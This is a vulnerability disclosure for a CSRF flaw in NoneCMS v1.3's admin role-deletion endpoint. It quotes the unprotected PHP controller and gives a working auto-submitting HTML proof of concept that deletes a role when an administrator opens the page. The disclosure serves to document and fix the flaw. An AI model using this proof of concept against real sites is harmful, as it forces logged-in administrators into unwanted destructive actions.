NoneCMS v1.3 has a CSRF vulnerability in public/index.php/admin/role/dele.html

[ghost]

NoneCMS v1.3 has a CSRF vulnerability in public/index.php/admin/role/dele.html, as demonstrated by deleting the admin role.

Vulnerability code is located in application\admin\controller\Role.php:

    /**
     * 删除角色信息
     */
    public function dele()
    {
        $id = input('param.id/d',0);
        $role = AdminRole::get($id);
        if ($role && $role->delete()) {
            return ['status' => 1, 'msg' => '删除成功'];
        } else {
            return ['status' => 0, 'msg' => '删除失败'];
        }
    }

No CSRF token here.

So we can write the PoC as follows, csrf.html:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://172.23.64.227:88/nonecms/public/index.php/admin/role/dele.html">
      <input type="hidden" name="id" value="6" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
  <!-- JS automatically click -->
  <script>
    var m = document.getElementsByTagName('form')[0];
    m.submit();
  </script>
</html>

Before the administrator visits the malicious link, there is a admin role existing in role management page:

When the administrator visits the malicious link, the page will automatically click to trigger the CSRF attack:

Although the response status code returns 500, the admin role has been deleted successfully: